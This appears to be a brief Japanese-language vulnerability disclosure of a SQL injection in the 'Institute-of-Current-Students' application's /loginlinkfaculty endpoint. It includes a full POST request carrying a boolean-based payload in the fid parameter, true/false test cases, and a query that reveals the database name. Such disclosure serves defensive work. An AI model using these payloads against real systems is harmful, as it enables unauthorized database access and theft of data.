
Institute-of-Current-Students アプリケーションの loginlinkfaculty エンドポイントは、fid POST パラメータを介して SQL インジェクションに対して脆弱です。このパラメータは SQL クエリで使用される前に適切にサニタイズされないため、リモートの攻撃者は任意の SQL コマンドを実行できます。
/loginlinkfaculty (POST)fidicsnewhttp POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+321=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → 真
❌ -1' OR 2*3=4 AND 000942=000942 -- → 偽
SELECT database(); -- returns 'icsnew'
Isroil Mustafoqulov